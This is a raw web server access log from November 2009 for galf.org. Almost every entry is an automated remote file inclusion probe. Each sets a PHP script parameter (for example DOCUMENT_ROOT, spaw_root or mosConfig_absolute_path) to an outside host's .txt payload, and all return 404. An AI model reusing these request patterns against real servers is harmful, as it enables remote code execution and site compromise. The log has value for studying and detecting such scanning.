212.152.181.222 - - [22/Nov/2009:23:05:24 -0800] "GET /logs/access.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.152.181.222 - - [22/Nov/2009:23:05:25 -0800] "GET /logs/access_090525.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:23:06:37 -0800] "GET /logs/access.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.logica-tech.com/foto/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:23:06:37 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.logica-tech.com/foto/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:23:06:38 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.logica-tech.com/foto/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [22/Nov/2009:23:06:53 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [22/Nov/2009:23:06:53 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [22/Nov/2009:23:06:55 -0800] "GET /logs/access_091012.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.216.213.119 - - [22/Nov/2009:23:07:51 -0800] "GET /logs/access_090504.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.129.64.89 - - [22/Nov/2009:23:08:25 -0800] "GET /logs/access_090504.log%20%20///modules/xfsection/modify.php?dir_module=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.129.64.89 - - [22/Nov/2009:23:08:25 -0800] "GET /logs/access_091102.log%20%20///modules/xfsection/modify.php?dir_module=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [22/Nov/2009:23:08:43 -0800] "GET /logs//photo//e404.php?INCLUDE_FOLDER=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [22/Nov/2009:23:08:43 -0800] "GET /photo//e404.php?INCLUDE_FOLDER=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [22/Nov/2009:23:08:43 -0800] "GET /logs/access_090309.log//photo//e404.php?INCLUDE_FOLDER=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.86.9.234 - - [22/Nov/2009:23:08:44 -0800] "GET /logs/access_090706.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://h1.ripway.com/CaUghaNT/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:23:08:52 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:23:08:52 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:23:08:56 -0800] "GET /logs/access_090622.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:23:08:59 -0800] "GET /logs/access_090817.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [22/Nov/2009:23:09:00 -0800] "GET /photo//e404.php?INCLUDE_FOLDER=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
94.79.54.195 - - [22/Nov/2009:23:09:00 -0800] "GET /logs//photo//e404.php?INCLUDE_FOLDER=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
94.79.54.195 - - [22/Nov/2009:23:09:00 -0800] "GET /logs/access.log//photo//e404.php?INCLUDE_FOLDER=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
118.107.162.36 - - [22/Nov/2009:23:09:27 -0800] "GET /logs/access_090817.log%20%20///component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [22/Nov/2009:23:09:27 -0800] "GET //component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [22/Nov/2009:23:09:27 -0800] "GET /logs///component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [22/Nov/2009:23:09:40 -0800] "GET /logs/access_090817.log%20%20///component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [22/Nov/2009:23:09:40 -0800] "GET //component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [22/Nov/2009:23:09:40 -0800] "GET /logs///component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [22/Nov/2009:23:09:45 -0800] "GET /logs/access_090720.log%20%20///component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.15.75 - - [22/Nov/2009:23:09:55 -0800] "GET /logs//modules/mod_mainmenu.php?mosConfig_absolute_path=http://hcmdmc.com/bbs/icon/private_icon/3/content/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.15.75 - - [22/Nov/2009:23:09:55 -0800] "GET /modules/mod_mainmenu.php?mosConfig_absolute_path=http://hcmdmc.com/bbs/icon/private_icon/3/content/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.15.75 - - [22/Nov/2009:23:09:55 -0800] "GET /logs/access_090629.log//modules/mod_mainmenu.php?mosConfig_absolute_path=http://hcmdmc.com/bbs/icon/private_icon/3/content/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [22/Nov/2009:23:10:00 -0800] "GET /logs/access_090720.log%20%20///component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.98.136.21 - - [22/Nov/2009:23:10:04 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.98.136.21 - - [22/Nov/2009:23:10:04 -0800] "GET /logs/access_090817.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.vnmhost.net/01.gif? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.98.136.21 - - [22/Nov/2009:23:10:04 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.24.195.67 - - [22/Nov/2009:23:10:07 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.vnmhost.net/01.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.24.195.67 - - [22/Nov/2009:23:10:07 -0800] "GET /logs/access_090817.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.vnmhost.net/01.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.24.195.67 - - [22/Nov/2009:23:10:07 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.vnmhost.net/01.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.24.195.67 - - [22/Nov/2009:23:10:14 -0800] "GET /logs/access_090622.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.vnmhost.net/01.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.98.136.21 - - [22/Nov/2009:23:10:26 -0800] "GET /logs/access_090622.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:23:10:51 -0800] "GET /logs/access_090817.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.logica-tech.com/foto/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.86.9.234 - - [22/Nov/2009:23:10:59 -0800] "GET /logs/access_090706.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://h1.ripway.com/CaUghaNT/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:23:11:02 -0800] "GET /logs/access_090622.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.logica-tech.com/foto/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.86.9.234 - - [22/Nov/2009:23:11:15 -0800] "GET /logs/access_091012.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://h1.ripway.com/CaUghaNT/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:23:11:19 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:23:11:20 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:23:11:20 -0800] "GET /logs/access_090817.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:23:11:25 -0800] "GET /logs/access_090622.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:23:12:54 -0800] "GET /logs/access_090810.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:23:13:07 -0800] "GET /logs/access_090817.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.86.9.234 - - [22/Nov/2009:23:13:08 -0800] "GET /logs/access_091012.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://h1.ripway.com/CaUghaNT/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.152.181.222 - - [22/Nov/2009:23:13:42 -0800] "GET /logs/access.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.152.181.222 - - [22/Nov/2009:23:13:42 -0800] "GET /logs/access_090525.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.152.181.222 - - [22/Nov/2009:23:14:05 -0800] "GET /logs/access_091102.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.24.195.67 - - [22/Nov/2009:23:14:30 -0800] "GET /logs/access.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.vnmhost.net/01.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.24.195.67 - - [22/Nov/2009:23:14:39 -0800] "GET /logs/access_090413.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.vnmhost.net/01.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.98.136.21 - - [22/Nov/2009:23:16:02 -0800] "GET /logs/access.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.98.136.21 - - [22/Nov/2009:23:16:08 -0800] "GET /logs/access_090413.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.98.136.21 - - [22/Nov/2009:23:19:10 -0800] "GET /logs/access_090622.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:23:19:11 -0800] "GET /logs/access.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:23:19:45 -0800] "GET /logs/access_090413.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.112.174 - - [22/Nov/2009:23:20:05 -0800] "GET /logs/access_090629.log%20%20//inc/header.php/step_one.php?server_inc=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.112.174 - - [22/Nov/2009:23:20:05 -0800] "GET /logs//inc/header.php/step_one.php?server_inc=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.112.174 - - [22/Nov/2009:23:20:05 -0800] "GET /logs/access_090914.log%20%20//inc/header.php/step_one.php?server_inc=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.112.174 - - [22/Nov/2009:23:20:05 -0800] "GET /inc/header.php/step_one.php?server_inc=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.112.174 - - [22/Nov/2009:23:20:32 -0800] "GET /logs/access_090914.log//inc/header.php/step_one.php?server_inc=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.112.174 - - [22/Nov/2009:23:20:32 -0800] "GET /logs/access_090629.log//inc/header.php/step_one.php?server_inc=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [22/Nov/2009:23:21:39 -0800] "GET /logs/access.log%20%20//photo//e404.php?INCLUDE_FOLDER=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
94.79.54.195 - - [22/Nov/2009:23:21:44 -0800] "GET /logs/access_090914.log%20%20//photo//e404.php?INCLUDE_FOLDER=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.115.117 - - [22/Nov/2009:23:22:19 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "galf.org"
67.195.115.117 - - [22/Nov/2009:23:22:20 -0800] "GET /tmp/?M=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "galf.org"
221.139.3.168 - - [22/Nov/2009:23:23:53 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.139.3.168 - - [22/Nov/2009:23:23:53 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.139.3.168 - - [22/Nov/2009:23:23:53 -0800] "GET /logs/access_091102.log//admin/spaw/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.139.3.168 - - [22/Nov/2009:23:24:08 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.139.3.168 - - [22/Nov/2009:23:24:08 -0800] "GET /logs/access_091102.log//admin/spaw/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.139.3.168 - - [22/Nov/2009:23:24:08 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:23:24:18 -0800] "GET /logs/access_090810.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.logica-tech.com/foto/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:23:24:49 -0800] "GET /logs/access_090817.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.logica-tech.com/foto/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.129.64.89 - - [22/Nov/2009:23:24:54 -0800] "GET /logs/access_090427.log///modules/xfsection/modify.php?dir_module=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:23:24:58 -0800] "GET /logs/access_090810.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:23:25:07 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:23:25:07 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:23:25:08 -0800] "GET /logs/access_091102.log//admin/spaw/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:23:25:17 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:23:25:17 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:23:25:20 -0800] "GET /logs/access_091102.log//admin/spaw/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:23:25:22 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:23:25:22 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:23:25:23 -0800] "GET /logs/access_091102.log//admin/spaw/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:23:25:31 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:23:25:32 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:23:25:32 -0800] "GET /logs/access_090817.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:23:25:34 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:23:25:34 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:23:25:35 -0800] "GET /logs/access_091102.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:23:25:38 -0800] "GET /logs/access_091102.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:23:25:41 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:23:25:41 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:23:25:44 -0800] "GET /logs/access_091102.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.129.64.89 - - [22/Nov/2009:23:25:57 -0800] "GET /logs/access_090413.log///modules/xfsection/modify.php?dir_module=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.107.130 - - [22/Nov/2009:23:26:18 -0800] "GET /send_reminders.php?includedir=http://emwave.knu.ac.kr/bbs///skin/happycast_category_lightblack/robots.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.107.130 - - [22/Nov/2009:23:26:18 -0800] "GET /logs/access_090713.log%20%20/send_reminders.php?includedir=http://emwave.knu.ac.kr/bbs///skin/happycast_category_lightblack/robots.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.107.130 - - [22/Nov/2009:23:26:18 -0800] "GET /logs/send_reminders.php?includedir=http://emwave.knu.ac.kr/bbs///skin/happycast_category_lightblack/robots.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.129.64.89 - - [22/Nov/2009:23:26:30 -0800] "GET /logs/access_090413.log///modules/xfsection/modify.php?dir_module=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [22/Nov/2009:23:26:35 -0800] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://yunk.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [22/Nov/2009:23:26:39 -0800] "GET /PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://yunk.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [22/Nov/2009:23:26:39 -0800] "GET /logs/access_090921.log%20%20//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://yunk.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.107.130 - - [22/Nov/2009:23:27:03 -0800] "GET /logs/access_090511.log%20%20/send_reminders.php?includedir=http://emwave.knu.ac.kr/bbs///skin/happycast_category_lightblack/robots.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:23:27:40 -0800] "GET /logs/access_091102.log//admin/spaw/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:23:27:40 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
